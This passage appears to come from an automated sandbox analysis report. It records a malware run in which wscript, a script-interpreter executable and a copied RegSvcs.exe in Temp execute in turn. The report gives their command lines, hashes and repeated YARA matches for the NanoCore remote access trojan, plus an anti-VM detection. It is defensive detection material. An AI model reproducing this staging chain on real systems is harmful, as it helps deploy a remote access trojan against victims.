          • Rule: NanoCore, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          Target ID:22
          Start time:08:10:50
          Start date:02/02/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
          Imagebase:0x7ff60c2e0000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Target ID:23
          Start time:08:10:55
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          Target ID:24
          Start time:08:11:00
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x6f0000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          Target ID:25
          Start time:08:11:04
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          Target ID:26
          Start time:08:11:11
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x6c0000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          Target ID:27
          Start time:08:11:13
          Start date:02/02/2023
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
          Imagebase:0x7ff60c2e0000
          File size:163840 bytes
          MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Target ID:28
          Start time:08:11:16
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
          Imagebase:0x310000
          File size:936754 bytes
          MD5 hash:8A57722EC9067FAAA9FF2980C5F02838
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_AntiVM_1, Description: Yara detected AntiVM autoit script, Source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown

          Target ID:30
          Start time:08:11:21
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0x950000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          Target ID:31
          Start time:08:11:35
          Start date:02/02/2023
          Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
          Imagebase:0xe70000
          File size:45152 bytes
          MD5 hash:2867A3817C9245F7CF518524DFD18F28
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:.Net C# or VB.NET

          No disassembly